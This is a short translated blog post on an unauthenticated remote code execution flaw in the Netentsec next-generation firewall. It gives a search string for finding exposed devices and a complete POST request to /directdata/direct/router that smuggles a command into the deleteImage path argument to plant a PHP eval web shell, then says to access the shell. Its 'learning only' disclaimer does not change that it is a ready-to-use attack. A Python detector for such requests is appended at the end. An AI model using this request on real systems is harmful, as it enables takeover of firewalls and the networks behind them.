网康 (Netentsec) Firewall Unauthenticated RCE

2021-04-25  migrate_

For exchange and learning purposes only. Do not use for illegal purposes; otherwise you bear the consequences yourself.

Referencing an expert's write-up

https://xz.aliyun.com/t/9495

Finding targets

app="网康科技-下一代防火墙"

Capture the request and modify it (Host and Referer)

POST /directdata/direct/router HTTP/1.1
Host: xx.xx.xx
Cookie: PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xx.xx.xx.xx/user/login/index/logined/fail
Dnt: 1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Connection: close
Content-Length: 221

{
    "action": "SSLVPN_Resource",
    "method": "deleteImage",
    "data":[{
      "data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"]
    }],
    "type": "rpc",
    "tid": 17
}

Accessing the shell
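
A defender-side check for the request shown above, as an added example that is not part of the original post: it parses a POST body sent to /directdata/direct/router and flags any RPC argument that contains shell metacharacters, the pattern the deleteImage payload relies on. The function names, the metacharacter set, the handling of a list of calls and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

ROUTER_PATH = "/directdata/direct/router"
# Characters that chain or redirect commands if an argument reaches a shell unquoted.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(")

# Constructed sample bodies (not captured traffic).
BENIGN = ('{"action":"SSLVPN_Resource","method":"deleteImage",'
          '"data":[{"data":["/var/www/html/logo.png"]}],"type":"rpc","tid":3}')
SUSPICIOUS = ('{"action":"SSLVPN_Resource","method":"deleteImage",'
              '"data":[{"data":["/var/www/html/logo.png;echo constructed"]}],'
              '"type":"rpc","tid":4}')


def iter_strings(value):
    """Yield every string nested anywhere inside a decoded JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, list):
        for item in value:
            yield from iter_strings(item)
    elif isinstance(value, dict):
        for item in value.values():
            yield from iter_strings(item)


def inspect_request(method, path, body):
    """Return findings for one HTTP request; an empty list means nothing flagged."""
    if method != "POST" or path.split("?", 1)[0] != ROUTER_PATH:
        return []
    try:
        decoded = json.loads(body)
    except ValueError:
        return ["unparseable JSON body sent to router endpoint"]
    # Assumption: a body may carry one call object or a list of them.
    calls = decoded if isinstance(decoded, list) else [decoded]
    findings = []
    for call in calls:
        if not isinstance(call, dict):
            continue
        target = f"{call.get('action')}.{call.get('method')}"
        for arg in iter_strings(call.get("data")):
            if SHELL_META.search(arg):
                findings.append(f"{target}: shell metacharacter in argument {arg!r}")
    return findings
```

The same rule can be run over proxy or WAF logs that record request bodies; a hit on this endpoint for a file-path argument warrants checking the web root for unexpected files.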
